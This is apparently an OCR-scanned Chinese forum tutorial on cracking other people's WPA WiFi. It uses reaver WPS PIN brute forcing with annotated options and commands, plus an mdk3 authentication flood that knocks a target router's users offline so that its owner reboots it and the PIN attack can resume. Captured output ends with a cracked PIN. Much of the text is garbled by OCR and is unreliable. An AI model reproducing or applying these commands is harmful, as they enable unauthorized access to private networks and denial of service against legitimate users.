PIN過程中出現(xiàn)的死循環(huán)解決方法與使用mdk3洪水攻擊模式使用教程

1、破解 WPA時(shí)，PIN出現(xiàn)死循環(huán)處理方法。（吾就愛無線論壇）如下面這個(gè)例子，一開始，或者破解一段時(shí)間后出來PIN無限循環(huán):wltnO monO B0：A1：D7：EB：31：FEfailure;failuresstartfailure-;faille;客戶Si MACfailuresfailkr«Strtfieaver占停止WPA2_6d7 61 Afl：BH;E4FaiJur«5 i0：20：47 （0 sptonds/pin）Trying pin 40000CQCUhRHING： 25 successiveTrying Pin 40000006UARNING： 25 s

2、ucceiveTrying pin 4000Q0QCURRNlhG： Z5 successive Trying pin 400DQ0C6 UflRNlNti 25 i-uccessive UARN1NG; LO Uiltd comIf q】r,，T Pi r* 4m E）閉Tf*jir'-i pin iOCiCKWUARNING： 25 successiveTryir pin 40XX>00UfiRNIf： 25 successiveTrying pin 4GQOOOOCUARHlNt： 25 successiveIf pin 4000000UARNING： 25 success

3、iveTrying pin 40000CCCUBRNIN&： 25 successiveTrying pin 40000006UAkMNt： 25 successiveeedinInflator00:30 I minidwep-gTk-30412wlanO monO KhAI :D7;EB:31 （吾就愛無線論壇 ） 本人經(jīng)過多次實(shí)驗(yàn)最后總結(jié)了解亦的辦法:Required Arguments:-i, -interface=<wlan> Name of the monitor-mode interface to use網(wǎng)卡的監(jiān)視接口，通常是mon0-b, -bssid=<

4、;mac> BSSID of the target APAP的MAC地址（吾就愛無線論壇 ）Optional Arguments:-m, -mac=<mac> MAC of the host system指定本機(jī)MAC地址，在AP有MAC過濾的時(shí)候需要使用-e, -essid=<ssid> ESSID of the target AP路由器的ESSID, 一般不用指定-c, -channel=<channel> Set the 802.11 channel for the interface (implies -f)信號的頻道，如果不指定會自動(dòng)掃描-o

5、, -out-file=<file> Send output to a log file stdout標(biāo)準(zhǔn)輸出到文件-s, -session=<file> Restore a previous session file恢復(fù)進(jìn)程文件-C, -exec=<command> Execute the supplied command upon successful pin recoverypin成功后執(zhí)行命令-D, -daemonize Daemonize reaver設(shè)置 reaver 成 Daemon-a, -auto Auto detect the best

6、advanced options for the target AP對目標(biāo)AP自動(dòng)檢測高級參數(shù)-f, -fixed Disable channel hopping禁止頻道跳轉(zhuǎn)-5, -5ghz Use 5GHz 802.11 channels使用5G頻道-v, -verbose Display non-critical warnings (-vv for more)顯示不重要警告信息-vv可以顯示更多-q, -quiet Only display critical messages只顯小關(guān)鍵信息-h, -help Show help顯示幫助(吾就愛無線論壇 )Advanced Options:

7、-p, -pin=<wps pin> Use the specified 4 or 8 digit WPS pin直接讀取psk (本人測試未成功，建議用網(wǎng)卡自帶軟件獲取)-d, -delay=<seconds> Set the delay between pin attempts 1pin問延時(shí)，默認(rèn)1秒，推薦設(shè)0-l, -lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts 60AP鎖定WPS后等待時(shí)間-g, -max-attempts=<num>

8、 Quit after num pin attempts最大pin次數(shù)-x, -fail-wait=<seconds> Set the time to sleep after 10 unexpected failures 010次意外失敗后等待時(shí)間，默認(rèn) 0秒-r, -recurring-delay=<x:y> Sleep for y seconds every x pin attempts每x次pin后等待y秒-t, -timeout=<seconds> Set the receive timeout period 5收包超時(shí)，默認(rèn)5秒-T, -m57-t

9、imeout=<seconds> Set the M5/M7 timeout period 0.20M5/M7超時(shí)，默認(rèn)0.2秒-A, -no-associate Do not associate with the AP （association must be done by another application）不連入AP （連入過程必須有其他程序完成）-N, -no-nacks Do not send NACK messages when out of order packets are received不發(fā)送NACK信息（如果一直pin不動(dòng)，可以嘗試這個(gè)參數(shù)）-S, -d

10、h-small Use small DH keys to improve crack speed使用小DH關(guān)鍵值提高速度（推薦使用）-L, -ignore-locks Ignore locked state reported by the target AP忽略目標(biāo)AP報(bào)告的鎖定狀態(tài)-E, -eap-terminate Terminate each WPS session with an EAP FAIL packet每當(dāng)收到EAP失敗包就終止WPS進(jìn)程-n, -nack Target AP always sends a NACK Auto對目標(biāo)AP總是發(fā)送NACK,默認(rèn)自動(dòng)-w, -win7

11、 Mimic a Windows 7 registrar False模擬win7注冊，默認(rèn)關(guān)閉（吾就愛無線論壇 ）個(gè)人心得對一個(gè)ap剛開始pin的時(shí)候打開-vv參數(shù)，如果順利，就中斷，然后改成-v繼續(xù)pin,反正進(jìn) 度是可以保存的reaver -i mon0 -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S如果一直pin不動(dòng)，嘗試加-N參數(shù)reaver -i mon0 -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S-N（吾就愛無線論壇 ）AP洪水攻擊1、打氣筒 mdk3攻擊模式操作方法首先檢測網(wǎng)卡：ifconfig -a然后模擬端口 ：airmon

12、-ng start wlan0接下來用：airodump-ng mon0掃描ap找到你pin死的路由器mac用mdk3做身份驗(yàn)證攻擊mdk3 mon0 a -a mac （被 pin 死的路由器的 mac）身份驗(yàn)證攻擊效果說明：此攻擊是針對無線AP的洪水攻擊，乂叫做身份驗(yàn)證攻擊。其原理就是向 AP發(fā)動(dòng)大量的虛假 的鏈接請求，這種請求數(shù)量一旦超 過了無線AP所能承受的范圍，AP就會自動(dòng)斷開現(xiàn)有鏈接， 使合法用戶無法使用無線網(wǎng)絡(luò)。迫使路由主人重啟路由器。說明：此命令功能強(qiáng)大，使用錯(cuò)誤會造成所有ap不能使用，請指定mac地址，然后使用，其余命令不要亂試。你要使用此命令的其他參數(shù)，請?jiān)敿?xì)閱讀此命令參數(shù)

13、詳解2、CDlinux mdk3攻擊模式操作方法首先進(jìn)入CDlinux ,打開水滴或者打氣筒搜索 pin死的MACM址（直接打開螃蟹或者 3070驅(qū)動(dòng)搜索無線 MAC 地址也OK。然后點(diǎn)擊左下角 CDlnux圖標(biāo)，依次打開無線安全mdk3-v6啟功程序土5L：DJ：br：EC:17:2F>14:£6：E4:文件管理器加密方式/WPA2.u _ U網(wǎng)綣瀏覽器設(shè)置cplay-ng 2Ea rci 32辦公 a多媒體 4附件 .-圖彩圖像:全epiay-ngEplaV n口cowpatty-4.6dsniff網(wǎng)紹嗅探ettercapFeedingBorteInflator kOkis

14、met-2010-R1macchanger MAC 修改 mdk3-關(guān)于 CDJinux關(guān)于X&© 口7期TWiyWfUn- tcpdump- 藝，|1門1 .CZ7/nxHydra為你pin死的路由的MAC進(jìn)入 mdk3后輸入命令 mdk3 mon0 a -a 40:16:9F:*:2C:B2(40:16:9F:*:2C:B2注意空格和大小寫)J mdk3'V6a - Authentication BoS modeSends authentication frames to all APs found inToo nuch client® Freeze o

15、r reset sone RPs*p - Bsic probing and ESSID Bruteforce niodeProbes AP and check for answeruseful for checking if SSID has been correctly decloaked or if AP is in your adaptors sending range SSID Bruteforcing is al鑰 possible with this test mod己.d - Beauthentication / Bisassociation Amok ModeKicks eve

16、rybody found Frorr AF'v - Michael shutdown exploitation (TKIP)Cance1s mil traffic continuouslyx- 802.1X testsu- UIDS/UIPS ConfusionConfuse/Abuse Intrusion Detection and Prevention Systemsf - HAC fiIter bruteforce modeThis test uses 吊 list oF known client MAC Adresses tries to authenticate them t

17、o the 91 yen AP while dnamiclly changing :its response tineaut far best perFornancet It cxirr-ently itorks only on APs who deny an open authentication request properly9= UFA Eowngrde testr?tfltions and APs sending IIPA encrypted packets*Jit：jCij can check if the sysadmin will try setting hise.i 勤 1!

18、 r<rpin死的路由是回車后進(jìn)入攻擊模式，時(shí)間不要太長，最多半分鐘就可以關(guān)閉對話框然后重新掃描網(wǎng)絡(luò)看 不是已經(jīng)不在了。等待主人重啟吧j mdk3-v6Connecting Ckent； 671C6：63：73：51iFF to target APt 40116：9Fw：2C；B2 fiP 4O：1B：9F：K：2C：B2 Is respondinsfVConnecting Cnent： 4E：35;61；15：5S：D1 to target AP： 4C：16：9F；W：2C：B2 Connecting Client； AA；FA：OS：24：E2;OB to target APj.

19、40；16：9F：®：2C;B2 Connecting Client： 01：96：17：94：2A：00 to target AP： 40：16：9F：R：2C：B2 AP 4O：1E：9F#：2C：B2 seems to be INVULNERABLE!1Device is still responding with 500 clients comected! 、 Connecting Client* C7：51：E4：E7：6E：27 to target AP： 40：16i9F：R：2C：B2 Connectina Client： B5：6E：32：C4：FF：05 to t

20、arget AP： 4O：1S：SF：V：2C：B2 AP 40：16：SFft2C：B2 s睥瞄 to be INVULNERABLE I，Device is xtn1 responding with 1000 clients connected!Connecting Client： 45：FC：25：73：3C：D9 to target AP： 40：lB：9F：w2C：B2 Connecting Client： 73：DH：C4：5C：OC：1E to target AP： 40：1S：3F：k2C：B2 Connecting Cent： 17：39：7E：71：B5：DB to tar

21、get AP： 40：L6：9FJEe2C AP 4O：16：9FA：2C：B2 sms to be INVULNERABLE!KDevice is st Hl responding with 1500 cl ients corinected1 S5 Connecting Client： 0O：3E：65：67：71：88 to target AP： 40：169FB2 Connecting Client： 6E;B4：66：9E：AE：3D to target AP： 40ll6：9F：«：2C：B2 Connecting CUent： EE：0A：18：8F：A8：00 to t

22、arget AP： 40：16：9F：S：2C：E2 AP 土嘩僉吵;以交配.筍 to be INVULNERABLE!fRef* E 如倔'ejf with 2000 clients connected!Connectir：<j Client：to target APt 40tl6i9Fdfc;2CiB2Packets sent：190 packetsZsec非CDLinux可以在這里啟動(dòng)命令輸入框HornethunarRsv&r!n 仆哉。r 1.0耕運(yùn)行程序.“一埋旃橫槍器文件管理器郵件卸該器*回爆胡骯而-設(shè)置v辦位«附件9互聯(lián)網(wǎng)A圖用系蜿眥）這 JtT

23、CDlinux關(guān)于皿EX注瞿minidwep-gtk屏耳亮度調(diào)節(jié)art NetWork藉汛QQWPSQackGU3 GParted村T弦由I業(yè)僧宜43口好區(qū)亍Th"M文件聞理甜、安 CDhnux干擔(dān)命名汪任莞宙哩器ftopNetWoifk:、：i j 矣遂璟序-圾用戶幗式r菁涅器】14;42注意：1、只有客戶端在線時(shí)進(jìn)行攻擊才可能達(dá)到迫使重啟目的，信號越強(qiáng)，效果越佳。2、 每次攻擊最好不超5min,否則卡死（看機(jī)器配置），稍停 1min在進(jìn)行攻擊，連續(xù)攻擊三 次應(yīng)該就可以了！8C210A pin 重碼或者pin死路由器的解決辦法（我驗(yàn)證貌似有效）j mlnidwep-gtk-3012

24、2無城網(wǎng)卡客戶5SMACwlanQwlanO RalinkRT2B70/3070 rt2BQ0usb - phy7于 6:C3:DA14:E6：E4:78:CC:54All信道4:E6:E436:D4:02-74TPLINIMERCUPCEC:17:2F:46:E1:32 LOL8C;21:0A：CC：FE：oa TP-LINK726 WPA2WPA-721 WPA2WPAic:tjj：erby：/i:tL ik-lini W HANWHA名都 強(qiáng)度信道加密方式WPA2WPZWPA2WPA加密方式WPA/WPA24 411業(yè)也方式選擇一。iingnq30:8ChinaNcn-701WPA2WP

25、Awps8C:21:0A;79:84:54 TP-LINK 7984BM -576 WPA2WPA11 WPA2 wp15:23:12-> 嘗誦Bin 中nqnq Aircplay/笠-:Aireplay"Airephyxomws數(shù)皇：0last24ReaverE退出看看我重碼拼死后，的時(shí)候J reaver mln*dwep-gtkSending USC NACK UFS tranaart.i “cl(code；CTrHijng Pin 373121387P Sending IlHFOL S1 hk 1 request Received identity request Sen

26、ding identity response Received Ml messase Sending H2 message Received M3 message Sending M4 nessage Received M5 nessage Sending H6 message Received WSC NACK 魚ending US。 Tfjingn 37312145Sending kblPUL SIHNI request Received identity request Sending identity response Received Ml message Sending M2 me

27、ssagei 帕out occurred皈。2), retrying last pin''JODMT|nr* Pq #mnywlanL - J Wl - I 西. IvdU Jl，（code：皈02）plast pin/拼死路由器后，整整一晚上沒有在找到這個(gè)信號，今天起床在看，發(fā)現(xiàn)又出來了，繼續(xù)拼，發(fā)現(xiàn)，重碼非常非常的嚴(yán)重，今天中午放棄 N次，今晚在小試一下，加了參數(shù)后，大減少重碼，堅(jiān)持就是勝利，往下看。Attack Coinmand (set the options you want belou without °-vvreadermon2 -b 8C：2i：0Ai

28、：79u ' a f 6 p "TPLINK_79F 七S .四-S -nUPS transaction failed (codel 0x03)re-trying last pinTrying pin 37318840Sending EAPOL START request-Received identity requestSending identity responseReceived Ml nessgeSending H2 messageReceived H3 nesseSending M4 messageReceived M3 nessgeSending USC NAC

29、KSending USC NACKWPS transaction failed (code： 0x03), re-trying Icist pin 98,96 complete 2012-09-1G 02;45：53 (6 secands/pin) Tryir)g pin 3731EI840Sending E9P0L START requestReceived identity requestSending identity responseReceived Ml messageSending M2 rnessaee警件¥芝Send i布 低匚 CQfTJUPS transactio

30、n i ailea (codeT 0x03)T re-trying last pinReceived Ml pusssbSending USC NACKSending WSC NACKUPS transact!or failed (code： 0x03)re-trying last pinTrying pin 37318840Sendine EAPOL START requestReceived identity requestSending identity responseReceived Ml 腐鴕含ageSending H2 m膠熨geReceived Ml messageSendin

31、g WSC NflCKSending USC NACKMPS transaction failed (code： 0x03), re-trying last pinTrying pin 37318340Sending EAPOL START requestReceived identity requestSending identity response Received Ml massage Sending N2 messageSending M6看到了吧，重碼，不過，是偶偶的了，加了參數(shù)后，不會像昨天和今天上午那樣，一直重碼一個(gè)碼不動(dòng)了.在往下看,奇跡出現(xiàn)了。I, ! J W J M CI

32、IK-flUL-lUII I dl JCLI L5JD* VAV-J1/ r I C VI 111 Id-Obkr H11H+ 9S+962 complete 2012-OS-18 02：46：03 (G seconds/pin)+ Trying pin 37318840i+j Sending EAPOL STAftT request+ Received identity request+ Sending identity response+ Reuived ItL 能醪與己+ Snd;ng M2 message+ H®«ived K3 Message+ Sending M4 message+ Received M5 Resssge+ Sending MG message+ Received H7 message+ Sending USC g+ Sending M9C NACK+ Pin cracked m 5857 seconds+ UPS PIN; 8373aMPPres® ai'rg key tp 營Pin碼重復(fù)出現(xiàn)死循環(huán)解決辦法1. xiaopanOS環(huán)境解決之道：當(dāng)你看到PIN到